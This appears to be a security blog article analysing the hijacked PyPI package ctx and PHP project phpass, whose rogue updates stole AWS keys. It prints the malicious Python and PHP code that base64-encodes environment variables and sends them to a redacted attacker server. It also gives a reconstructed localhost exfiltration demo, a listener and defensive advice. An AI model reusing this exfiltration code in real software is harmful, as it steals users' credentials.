A sharp-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.
Prompted by an online discussion about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPI repository had suddenly received an “update”, despite not otherwise having been touched since late 2014.
Theoretically, of course, there is nothing wrong with old packages coming back to life suddenly.
Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally motivates them to apply some long-overdue bug fixes.
In other cases, new maintainers step in, in good faith, to revive abandonware projects.
But packages can also fall victim to covert takeovers, where the relevant account passwords are hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.
Simply put, some package “revivals” are carried out entirely in bad faith, giving cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.
The attackers don’t necessarily aim at any specific users of the package they compromise – often, they simply watch and wait to see who falls for their package bait-and-switch…
…at which point they have a way of targeting the users or companies that did.
New code, old version number
In this attack, Yee Ching Tok noticed that although the package was abruptly updated, its version number didn’t change, presumably in the hope that some people might [a] fetch the new version anyway, perhaps even automatically, yet [b] not bother to look for differences in the code.
But a diff (short for difference, in which only new, changed or deleted lines of code are examined) showed the following lines added to the Python code:
if environ.get('AWS_ACCESS_KEY_ID') is not None:
    self.secret = environ.get('AWS_ACCESS_KEY_ID')
You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible in Python via os.environ, are memory-only key=value settings associated with a specific running program.
Data that is handed to a program via a memory-only block never needs to be written to disk, so this is a handy way of passing across secret data such as encryption keys, while guarding against saving that data somewhere it shouldn’t be by mistake.
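As a minimal sketch of what that looks like in practice (the variable name EXAMPLE_API_KEY below is just a placeholder of our own, not anything from the attack):

import os

# Read a secret handed to this process via its environment.
# get() returns None if the variable isn't set, so the program
# can detect that and fall back to some other configuration source.
api_key = os.environ.get('EXAMPLE_API_KEY')

if api_key is not None:
    print('Found a key of length', len(api_key))
else:
    print('No key set in this environment')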
However, the flip side is that if you can poison a running program that already has access to that memory-only process environment, you can read out the secrets for yourself and steal the private data, for example by sneaking it out amongst regular-looking network traffic.
And if you leave the bulk of the source code you are poisoning untouched, its normal functions will still work as before, so the malicious changes to the package are likely to go unnoticed.
Why now?
Apparently, the reason this package was attacked only recently is that the domain name the original maintainer used for email had just expired.
The attackers were therefore able to purchase the now unused domain name, set up an email server of their own, and reset the password to the account.
Intriguingly, the poisoned ctx package was itself soon updated twice more, adding extra “secret sauce” to the infected code – this time with more aggressive data-stealing behaviour.
The requests.get() line below calls out to an external server controlled by the crooks, although we have redacted the domain name here:
def sendRequest(self):
    str = ""
    for _, v in environ.items():
        str += v + " "
    ### --encode string into base64
    message_bytes = str.encode('ascii')
    base64_bytes = base64.b64encode(message_bytes)
    base64_message = base64_bytes.decode('ascii')
    resp = requests.get("https://[REDACTED]/hacked/" + base64_message)
The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.
The reply that comes back doesn’t really matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.
If you want to try this for yourself, you can create a standalone Python program based on the code above, such as the minimal sketch that follows.
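This is our own reconstruction for demonstration purposes, not the attackers’ exact code; localhost:8080 is simply where our test listener (see below) will be running:

import base64
from os import environ

import requests

# Collect every value in our own process environment,
# much as the rogue ctx update did.
blob = ""
for _, v in environ.items():
    blob += v + " "

# Encode the collected data as base64 so that it travels as one
# innocent-looking string at the end of the URL.
encoded = base64.b64encode(blob.encode()).decode()

# Call out to our own listener instead of the crooks' server.
resp = requests.get("http://localhost:8080/hacked/" + encoded, timeout=10)
print("Listener replied with HTTP status", resp.status_code)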
Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit), and run the Python code.
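If you don’t have ncat to hand, a rough Python stand-in for that listener (our own sketch, not part of the original research setup) might look like this – it accepts requests on localhost:8080, prints each request line, and sends back a minimal reply:

from http.server import BaseHTTPRequestHandler, HTTPServer

class DumpHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The exfiltrated base64 blob arrives as part of the URL path,
        # after the /hacked/ prefix, so printing the path reveals it.
        print("GET", self.path)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

# Listen on localhost:8080 to match the demo script above.
HTTPServer(("127.0.0.1", 8080), DumpHandler).serve_forever()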
Here, we’re in the bash shell, and we’ve used env -i to strip down the environment variables to save space; we’re running the Python exfiltration script with a fake AWS environment variable set (the access key we chose is one of Amazon’s own deliberately invalid examples used for documentation).
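If you’d rather stay entirely in Python than juggle env -i in the shell, a roughly equivalent launcher (our own sketch; exfil_demo.py is whatever name you gave the demo script above) would be:

import subprocess
import sys

# Run the demo script with a minimal, controlled environment, so that the
# only variable it can "steal" is one deliberately invalid AWS access key
# (AKIAIOSFODNN7EXAMPLE is Amazon's own documentation-only example).
subprocess.run(
    [sys.executable, "exfil_demo.py"],
    env={"AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE"},
    check=True,
)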
The listening server (you need to start it first, so that the Python code has something to connect to) will answer the request and dump the data that was sent to it.
The GET /... line in its output captures the encoded data that was exfiltrated via the URL.
We can now decode the base64 data from the GET request, revealing the fake AWS key that we added to the process environment in the other window.
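For example, a couple of lines of Python will do the decoding (the captured string below is a stand-in of our own, showing what Amazon’s documentation-only example key AKIAIOSFODNN7EXAMPLE looks like once encoded):

import base64

# Paste in whatever appeared after /hacked/ in your listener's output.
captured = "QUtJQUlPU0ZPRE5ON0VYQU1QTEU="

print(base64.b64decode(captured).decode('ascii'))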
Related crimes
Out of interest, Yee Ching Tok went looking elsewhere for the exfiltration servername that we redacted above.
Bingo!
The same server recently turned up in code uploaded to a PHP project on GitHub, presumably because it had been compromised by the same attackers at about the same time.
That project is a formerly legitimate PHP hashing toolkit called phpass, but it now contains these three lines of unwanted and dangerous code:
$access = getenv('AWS_ACCESS_KEY_ID');
$secret = getenv('AWS_SECRET_ACCESS_KEY');
$xml = file_get_contents("http://[REDACTED]hacked/$access/$secret");
Here, any Amazon Web Services access secrets, which are pseudorandom character strings, are extracted from the environment memory (getenv() in the PHP code above is the equivalent of os.environ.get() in the rogue Python code you saw before) and embedded in a URL.
This time, the miscreants have used http instead of https, so they not only steal your secret data for themselves, but also make the connection without encryption, thereby exposing your AWS secrets to anyone along the network path who happens to be logging your traffic.
What to do?
- Don’t blindly accept open-source package updates just because they show up. Go through the code differences yourself before you decide that an update is in your interest. Yes, determined criminals will usually hide their malicious code changes more subtly than in the hacks you see above, so it may not be easy to spot, but if you don’t look at all, the crooks can get away with anything they like.
- Check suspicious changes against a maintainer’s account history before trusting them. Look at the documentation in the previous version of the code (you probably have that code already) for details of the previous maintainers’ contacts, and see what has changed in the account since the last update. In particular, be suspicious of domain names that expired and were only recently re-registered, or of account changes that introduce new maintainers with no obvious prior interest in the project.
- Don’t rely solely on module tests that verify correct behaviour. Look for generic tests that also detect unwanted, unusual and unexpected behaviours, especially behaviours with no obvious connection to the package you updated. For example, a utility that calculates password hashes shouldn’t need to make any network connections, so if it does when you try it out (using test data rather than live data, of course!), you should suspect foul play – as in the sketch after this list.
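As a rough illustration of that last point, here’s a minimal sketch (our own example, using only Python’s standard library; hash_password() is a made-up stand-in for whatever routine you’re testing) of a test that fails if a supposedly pure hashing function tries to open a network connection:

import hashlib
import socket

def hash_password(pw: str) -> str:
    # A pure computation: hashing should never need the network.
    return hashlib.sha256(pw.encode()).hexdigest()

def test_hashing_does_not_touch_the_network():
    # Temporarily replace socket creation so that most attempts to open
    # a network connection during the test blow up immediately.
    real_socket = socket.socket
    def no_network(*args, **kwargs):
        raise AssertionError("unexpected network activity during hashing")
    socket.socket = no_network
    try:
        assert len(hash_password("test data only")) == 64
    finally:
        socket.socket = real_socket

if __name__ == "__main__":
    test_hashing_does_not_touch_the_network()
    print("ok: no unexpected network activity detected")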
Threat detection tools such as Sophos XDR (the letters XDR are an industry term meaning extended detection and response) can help here by letting you keep an eye on the programs you’re testing and then review their activity records for behaviours that shouldn’t be there.
After all, if you know what your software is supposed to do, you ought to be able to spot when it does something it’s NOT supposed to!